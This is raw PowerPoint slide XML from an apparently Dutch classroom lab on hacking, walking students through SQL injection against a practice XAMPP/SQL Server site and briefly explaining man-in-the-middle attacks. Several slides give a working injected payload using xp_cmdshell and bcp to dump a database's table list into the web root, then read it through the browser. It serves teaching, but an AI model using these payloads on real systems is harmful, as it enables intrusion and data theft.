          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sp_databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>haalt alle databases op</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> stopt het resultaat in een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9314822" y="3670837"/>
            <a:ext cx="907810" cy="156401"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C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Tekstvak 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375946" y="5897675"/>
            <a:ext cx="3449880" cy="646331"/>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Vraag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>: waar zou er nu een file zijn toegevoegd?????</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="804184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170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Sluit de browser als die nog open is en open deze vervolgens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             Vul de volgende URL in: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://10.0.0.25/db.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Wat zie je?   Realiseer je goed wat je nu ziet          </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2929364" y="4928547"/>
            <a:ext cx="6272312" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Door het resultaat van voorgaande query naar de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>webdirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> te pushen, kun je er gewoon via de browser bij.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hier is het dus nuttig dat je weet dat je met een XAMPP server te maken hebt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1941250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647426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Sluit de browser als die nog open is en open deze vervolgens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Je weet nu dat er een database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:b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66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=''U''" </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:\xampp\htdocs\tabel.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" -c -T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Klik op login ........! lees uit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.0.25/tabel.txt</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8536670" y="3350339"/>
            <a:ext cx="2845823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Let op de spaties.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Tekstvak 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4307991" y="4779667"/>
            <a:ext cx="5911184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> SQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> DQ   (SQ=Single Quote, DQ=Double Quote)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336815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6521863" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"The man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>" attack</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0353" y="3208344"/>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web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8"/>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rgbClr val="FF0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12281" y="5049838"/>
            <a:ext cx="4211573" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De hacker onderschept verkeer tussen de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> en de server en past het verkeer aan om er b.v. gewin uit te halen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>veranderen van een rekeningnummer bij een storting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hacker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5360" y="5729739"/>
            <a:ext cx="909429" cy="909429"/>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Rechte verbindingslijn met pijl 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3649366" y="3708818"/>
            <a:ext cx="1385268" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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Rechte verbindingslijn met pijl 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016488" y="3696024"/>
            <a:ext cx="0" cy="1893419"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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Rechte verbindingslijn met pijl 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392408" y="3708818"/>
            <a:ext cx="0" cy="1870047"/>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Rechte verbindingslijn met pijl 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5392408" y="3701417"/>
            <a:ext cx="1434054" cy="7401"/>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Rechte verbindingslijn met pijl 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694789" y="4046857"/>
            <a:ext cx="1385268" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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Rechte verbindingslijn met pijl 48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5694789" y="4046858"/>
            <a:ext cx="0" cy="1835782"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sys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Rechte verbindingslijn met pijl 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4693027" y="4046858"/>
            <a:ext cx="0" cy="1793452"/>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Rechte verbindingslijn met pijl 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3518662" y="4046857"/>
            <a:ext cx="1170059" cy="0"/>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 name="Tekstvak 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682480" y="1817993"/>
            <a:ext cx="2312105" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Benadeelden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de individuele gebruiker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>het bedrijf achter de website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>financiële-en imagoschade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213094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62760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Sluit de browser als die nog open is en open deze vervolgens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t>: Je weet nu dat er een database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is met een tabel</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
